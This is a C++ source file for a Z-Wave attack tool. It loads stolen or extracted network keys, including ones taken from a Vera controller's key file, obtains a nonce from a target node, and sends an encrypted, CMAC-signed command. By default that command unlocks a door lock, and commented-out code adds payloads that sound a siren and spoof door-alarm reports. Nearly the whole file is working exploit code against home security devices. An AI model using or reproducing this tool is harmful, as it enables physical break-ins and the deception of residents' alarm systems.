#include "MacIface.h"
#include "MAC.h"
#include "APP.h"
#include "Security.h"
#include "SecurityHelpers.h"
#include "FrameControl.h"
#include "ScapyRadioIface.h"
#include "Timer.h"

#include <getopt.h>
#include <stdint.h>
#include <cstring>
#include <iostream>
#include <fstream>
#include <time.h>

#define ARG_TOKEN ":"

/* Opens your doorlock, but you still have to open the door yourself to walk inside */

//TODO: Just make file loading rather than input raw hex in command line (or figure out how to do it)

Zwave::NonceCache g_cache;
Zwave::KeyRing g_keys;
uint8_t g_recvBuf[Zwave::MAC::MAX_MPDU_SIZE];

size_t parseCMDinfo (char *opt, uint8_t* cmd, size_t maxlen)
{
	std::string option = std::string (opt);
	size_t len = option.length ();
	
	size_t start = 0;
	size_t end;
	size_t cmdSize = 0;

	while (((end = option.find_first_of (ARG_TOKEN, start)) != std::string::npos) && (cmdSize < maxlen))
		{
			cmd[cmdSize] = (uint8_t)strtoul (option.substr (start, end - start).c_str(), NULL, 16);
			start = end + 1;
			cmdSize++;			
		}

		// The last one has no token, so do it here
		if (cmdSize < maxlen)
			{		
				cmd[cmdSize] = (uint8_t)strtoul (option.substr (start, len - start).c_str (), NULL, 16);
				cmdSize++;
			}

		return cmdSize;
}

void parseMACinfo (char *opt, uint32_t &homeId, uint8_t &srcId, uint8_t &dstId)
{
	std::string option = std::string(opt);
	size_t len = option.length ();	
	
// Get HomeID
	size_t start = 0;
	size_t end = option.find_first_of (ARG_TOKEN, start);	
	if (end == std::string::npos)
		return;
	homeId = (uint32_t)strtoul(option.substr (start, end-start).c_str (),NULL,16);

// Get SrcId
	start = end + 1;
	end = option.find_first_of (ARG_TOKEN, start);
	if (end == std::string::npos)
		return;
	srcId = (uint8_t)strtoul(option.substr (start, end-start).c_str (), NULL, 16);

// Get DstId	
	start = end + 1;
	if (start > (len-1))	
		return;

	dstId = (uint8_t) strtoul (option.substr (start, len - start).c_str (), NULL, 16);
	
	return;
}
 
void GetRandomIV(uint8_t *iv)
{
	for (int i=0; i< Zwave::EncPayload::IV_SIZE; i++)
		{
			iv[i] = rand () % 265;
		}

	return;
}

void PrintHex (std::string header, uint8_t *buf, size_t len)
{
	size_t i;
	std::cout << header << ": " << std::hex;
	for (i=0;i<len;i++)
		{
			std::cout << " " << (uint16_t)buf[i];
		}
	std::cout << std::endl << std::dec;
	return;
}

uint8_t* GetNonceReport (Zwave::MacIface *mac, uint8_t fromNode)
{
	Zwave::MAC::mhr_fixed_t *mhr;
	Zwave::APP::ahr_t *ahr;
	size_t appLayerIndex;
	size_t nonceIndex;
	size_t frameIndex = 0;

	size_t bytesRead;
	Zwave::Timer timer;

	bool foundNonceReport = false;
	Zwave::FrameControl fc;

	appLayerIndex = sizeof(Zwave::MAC::mhr_single_t);
	nonceIndex = appLayerIndex + sizeof(Zwave::APP::ahr_t);
	Zwave::MAC::mpdu_ack_t mpdu;
	Zwave::MAC::mhr_single_t *mhr_single;

	
	timer = Zwave::Timer (2,0);
	while (!timer.HasTimeExpired ())
		{
			// This only returns when it reads something sent to us from dst
			bytesRead = mac->RecvNetworkFrom (g_recvBuf, Zwave::MAC::MAX_MPDU_SIZE, fromNode, &timer);
			mhr = (Zwave::MAC::mhr_fixed_t*)&g_recvBuf;
			fc = Zwave::FrameControl (mhr->frameCtl);
			if (fc.IsSinglecastFrame ())
				{
					mhr_single = (Zwave::MAC::mhr_single_t*)&g_recvBuf;

					// Since NONCE REPORT is a fixed size, lets do the easy check to see if our received frame is the right size
					if(bytesRead == Zwave::Security::NONCE_REPORT_FRAME_SIZE)
						{
							ahr = (Zwave::APP::ahr_t*)&g_recvBuf[appLayerIndex]; // point to the application layer
							if(ahr->cmd_class == Zwave::Security::CMD_CLASS) // To be sure it is a security frame
								{
									if(ahr->cmd == Zwave::Security::CMD_NONCEREP) // To be sure it is a nonce report
										{
											// Before we return, lets send the ACK
											Zwave::MAC::CreateAckReplyMPDU (mpdu, mhr_single);
											//usleep(30); // Put some IFS before we send
											mac->SendFrame ((uint8_t*)&mpdu, mpdu.mhr.length);

											return &g_recvBuf[nonceIndex]; // return with a pointer to the first byte of the nonce.
										}
								}
						}
				}
		}	

	return NULL; // For timeout
}

ssize_t SendNonceRequest (Zwave::MacIface *mac, uint8_t dst, size_t seqnbr, bool useBeam)
{
	Zwave::MAC::mpdu_single_t mpdu;
	Zwave::FrameControl fc;

	fc = Zwave::FrameControl ((uint16_t)0);
	fc.SetFrameType (Zwave::FrameControl::FRAME_TYPE_SINGLECAST);
	fc.SetAckRequestedFlag ();
	fc.SetSequenceNumber (seqnbr);

	mpdu.mhr.homeId = mac->GetHomeId_NetEnd ();
	mpdu.mhr.srcId = mac->GetNodeId ();
	mpdu.mhr.frameCtl = fc.ExportPackedField ();
	mpdu.mhr.length = sizeof(Zwave::MAC::mhr_single_t) + 3;
	mpdu.mhr.dstId = dst;
	mpdu.payload[0] = Zwave::Security::CMD_CLASS;
	mpdu.payload[1] = Zwave::Security::CMD_NONCEGET;
	mpdu.payload[2] = Zwave::MAC::GenerateChecksum ((uint8_t*)&mpdu, mpdu.mhr.length);

	PrintHex("Nonce Request Frame", (uint8_t*)&mpdu, mpdu.mhr.length);

	if (useBeam)
		return (mac->SendBeamedFrameWaitForAck((uint8_t*)&mpdu, mpdu.mhr.length, mpdu.mhr.dstId));
	else
		return (mac->SendFrameWaitForAck ((uint8_t*)&mpdu, mpdu.mhr.length));
	
}

bool loadKeyFile (std::string keyPath, uint8_t *key)
{
		std::ifstream keyFile(keyPath.c_str (), std::ifstream::binary);
		
		if (keyFile)
			{
				keyFile.read ((char*)key, Zwave::KeyRing::KEY_LEN);
				keyFile.close ();
				return true;
			}
		
	return false;
}

bool loadVeraFile (std::string keyPath)
{
		// TODO: Check for file errors while reading...
		std::ifstream keyFile(keyPath.c_str (), std::ifstream::binary);
		
		if (keyFile)
			{
				keyFile.read ((char*)g_keys.m_net, Zwave::KeyRing::KEY_LEN);
				keyFile.read ((char*)g_keys.m_mac, Zwave::KeyRing::KEY_LEN);
				keyFile.read ((char*)g_keys.m_enc, Zwave::KeyRing::KEY_LEN);
		
				keyFile.close ();
				return true;
			}

		return false;
}

int main(int argc, char *argv[])
{
	// Used to option flags
	bool haveMACKey = false;
	bool haveENCKey = false;
	bool haveMACinfo = false;
	bool haveCmd = false;
	bool useBeam = false;
	bool printUsage = false;
	char option_char;
	char *key;
	uint32_t homeId;
	uint8_t srcId;
	uint8_t dstId;
	uint8_t cmd[Zwave::EncPayload::MAX_ENCAP_PAYLOAD_SIZE - 1];
	size_t cmdLen;
	uint8_t seqnbr = 0;

	srand (time(NULL));

	while (((option_char = getopt(argc,argv,"n:e:a:v:m:c:s:bh")) != -1)&&(!printUsage))
		{
			switch (option_char){
				case 'n': 
					if (loadKeyFile (optarg, g_keys.m_net))
						{
							g_keys.GenerateFromNetworkKey (); 
							haveMACKey = true; 
							haveENCKey = true;
						} 
					break;
				case 'e': 
					if(loadKeyFile (optarg, g_keys.m_enc))
						{
							haveENCKey = true;
						}				
					break;
				case 'a':
					if(loadKeyFile (optarg, g_keys.m_enc))
						{
							haveMACKey = true;
						}
					break;
				case 'v': loadVeraFile(optarg); haveMACKey; haveMACKey = true; haveENCKey = true; break;
				case 'm': 
					parseMACinfo(optarg, homeId, srcId, dstId);
					haveMACinfo = true;
					break;
				case 'c':
					cmdLen = parseCMDinfo(optarg, cmd, Zwave::EncPayload::MAX_ENCAP_PAYLOAD_SIZE - 1);
					haveCmd = true;
					break;
				case 's':
					seqnbr = atoi(optarg) % Zwave::FrameControl::SEQNBR_MOD; break;
				case 'b':
					useBeam = true; break;
				case 'h': printUsage = true; break;
				case '?': printUsage = true; break;
			}
		}

	if (!(haveENCKey && haveMACKey && haveMACinfo) || printUsage)
		{
			std::cout << "Usage: " << argv[0] << " (-n networkKeyFilePath | -e encryptKeyFilePath -a cmacKeyFilePath | -v VeraKeyFilePath) -m \"HomeID:Src:Dst\" [-b] [-c \"byte0:byte1:...:byteN\"] [-s seqnbr] [-h]\n";
			std::cout << "In other words, provide the network key file OR both the encryption and cmac key files OR the vera file that contains all three keys\n";
			std::cout << "\t-n\t Path to a binary file containing Network Key\n";			
			std::cout << "\t-e\t Path to a binary file containing Encryption Key\n";
			std::cout << "\t-a\t Path to a binary file containing Authentication/CMAC Key\n";
			std::cout << "\t-v\t Path to the vera key file format (found in your Vera at /etc/cmh/keys)\n";
			std::cout << "\t-m\t MAC info, where HomeID, Source Node ID, and Destination Node ID are in hex and separated by a '" << ARG_TOKEN << "' token\n";
			std::cout << "\t-b\t (OPTIONAL) Specify that a beam is to be used to wake up dstId. Default is no beam. Note that only Long Continuous Beam is supported\n";
			std::cout << "\t-c\t (OPTIONAL) Payload to stuff into Encrypted Encapsulation. Each byte is separated by a '" << ARG_TOKEN << "' and is in hex. If this option is not used, the default command to open a doorlock is sent. Note: To avoid dealing with fragmentation, payload commands need to be " << (Zwave::EncPayload::MAX_ENCAP_PAYLOAD_SIZE - 1) << " or less.\n";
			std::cout << "\t-s\t (OPTIONAL) For the power users...specify the starting sequence number in DECIMAL(0 to 15) to be special.\n";
			std::cout << "\t-h\t prints this usage stuff again...\n\n";
			std::cout << "All keys are " << Zwave::KeyRing::KEY_LEN << " bytes, so the files should be at least this long\n\n";
			std::exit(1);
		}

	// For sanity's sake
	PrintHex ("Encryption Key", g_keys.m_enc, Zwave::KeyRing::KEY_LEN);
	PrintHex ("CMAC Key", g_keys.m_mac, Zwave::KeyRing::KEY_LEN);
	std::cout << "MAC info: HomeId=0x" << std::hex << homeId << " SrcId=0x" << (uint16_t)srcId << " DstId=0x" << (uint16_t)dstId << std::dec << std::endl;
 
	// Starting Z-Wave stuff here
	// TODO: These will also have to be command line options or imported other ways
	//uint8_t seqnbr = 0;
	//uint32_t homeid = 0x017b784d;
	//uint32_t homeid = 0xe56194a9;
	//uint8_t nodeid = 0x01;
	//uint8_t dst = 0x19; // Target to receive command
	
	std::string ipAddr = "127.0.0.1";
	uint8_t *nonce;
	uint8_t payloadLen;
	uint8_t iv[Zwave::EncPayload::IV_SIZE];//  = {0xAA,0xAA,0xAA,0xAA,0xAA,0xAA,0xAA,0xAA};
	Zwave::MAC::mpdu_single_t mpdu;

	Zwave::EncPayload encPay;
	Zwave::Security::mac_message_t macMsg;
	Zwave::ScapyRadioIface phy = Zwave::ScapyRadioIface (ipAddr, (uint16_t)52001, ipAddr, (uint16_t)52002);
	Zwave::MacIface mac = Zwave::MacIface (&phy, homeId, srcId, true);
	Zwave::APP::ahr_t *ahr;

	Zwave::Timer timer;
	bool acked = false;
	ssize_t result;
	
	while (!acked){
		std::cout << "Sent Nonce Request to Node " << (uint16_t)dstId << " with seqnbr=" << (uint16_t)(seqnbr%16) << ". Waiting for response.\n";
  	result = SendNonceRequest (&mac, dstId, seqnbr, useBeam);	
		seqnbr++;

		if (result == Zwave::MacIface::SENDFRAME_ACK)
			acked = true;
		else
			sleep(1);
	}

	std::cout << "Nonce Request ACK by target.\n";

	nonce = GetNonceReport (&mac, dstId);
	if (!nonce)
		{
			std::cout << "missed the nonce report. Try again...\n";
			exit(1);
		}

	std::cout << "received a nonce report.\n";
	PrintHex ("Nonce",nonce,Zwave::Security::NONCE_SIZE);


	//Time to send the command...multiple steps required
	std::cout << "Generating Encapsulated Payload.\n";

	std::memset (&encPay,0,sizeof(Zwave::EncPayload));

	// Generate out IV
	GetRandomIV (encPay.m_iv);
 	PrintHex ("IV", encPay.m_iv, Zwave::EncPayload::IV_SIZE);

	encPay.m_payload[0] = 0x00; // No fragmentation

	if (haveCmd)
		{
			std::memcpy (&encPay.m_payload[1], cmd, cmdLen);
			encPay.m_payloadLen = (uint8_t)(cmdLen + 1);
		}
	else
		{
			// Unlocks a door
			encPay.m_payload[1] = 0x62; // DoorLock command class
			encPay.m_payload[2] = 0x01; // Set command
			encPay.m_payload[3] = 0x00; // Unlock
			encPay.m_payloadLen = 0x04;
		}

	// This is for the Aeon Siren...hopefully to turn on the siren
	//encPay.m_payload[1] = 0x25; // Binary switch
	//encPay.m_payload[2] = 0x01; // Set?
	//encPay.m_payload[3] = 0x63; // Level?	Why not 0xFF?
	//encPay.m_payloadLen = 0x04;
	
	//This one is for the vera-e to spoof door alarms
//	encPay.m_payload[1] = 0x71; // Alarm cmd class
//	encPay.m_payload[2] = 0x05; // Report
//	encPay.m_payload[3] = 0x15; // 0x16 for clockwise turn (state is unlocked); 0x15 for counterclockwise (state is locked)
//	encPay.m_payload[4] = 0x01;
//	encPay.m_payloadLen = 0x05;

	encPay.m_nonceId = nonce[0];  // Received from last nonce report

	PrintHex ("Payload",encPay.m_payload, encPay.m_payloadLen);

	// Encrypt	
	Zwave::Security::Encrypt (encPay, g_keys.m_enc, nonce);
	PrintHex ("Encrypted Payload", encPay.m_payload, encPay.m_payloadLen);
	
	// Encap is done. Now lets construct the MPDU
	// MAC Layer header
	seqnbr++; // From the last ACKed nonce request
	Zwave::MAC::CreateSinglecastReplyMHR (mpdu.mhr, (Zwave::MAC::mhr_single_t*)g_recvBuf, seqnbr);
	
	// APP layer header
	ahr = (Zwave::APP::ahr_t*)&mpdu.payload[0];
	ahr->cmd_class = Zwave::Security::CMD_CLASS;
	ahr->cmd = Zwave::Security::CMD_ENCENCRT;

	// Sign
	Zwave::Security::GenerateCMAC (encPay, g_keys.m_mac, nonce, ahr->cmd, mac.GetNodeId (), dstId); // Adds cmac to encPay
	PrintHex ("CMAC", encPay.m_cmac, Zwave::EncPayload::CMAC_SIZE);

	// EncapPayload
	payloadLen = encPay.Pack (&mpdu.payload[sizeof(Zwave::APP::ahr_t)], Zwave::MAC::MAX_MSDU_SINGLE_PAYLOAD_SIZE);
	payloadLen += sizeof(Zwave::APP::ahr_t); // dont forget the app header

	// Encapsulated and Encrypted payload is now in the mpdu. Time to set the size field of the MHR
	mpdu.mhr.length = sizeof(Zwave::MAC::mhr_single_t) + payloadLen + Zwave::MAC::CHECKSUM_SIZE; 

	// Checksum time. Almost ready to send.
	mpdu.payload[payloadLen] = Zwave::MAC::GenerateChecksum ((uint8_t*)&mpdu, mpdu.mhr.length);
	
	PrintHex ("Outgoing Frame", (uint8_t*)&mpdu, mpdu.mhr.length);
	std::cout << "Sending Encrypted command to target. Awaiting ACK\n";

	if (useBeam)
		result = mac.SendBeamedFrameWaitForAck((uint8_t*)&mpdu, mpdu.mhr.length, mpdu.mhr.dstId);
	else
		result = mac.SendFrameWaitForAck((uint8_t*)&mpdu, mpdu.mhr.length);

	if (result == Zwave::MacIface::SENDFRAME_NOACK)
		{
			std::cout << "Command was not ACKed. It probably didn't work\n";
			exit(1);
		}
	
	std::cout << "Encap/Encrypt frame ACK by target.\n";
	
	return 0;
}
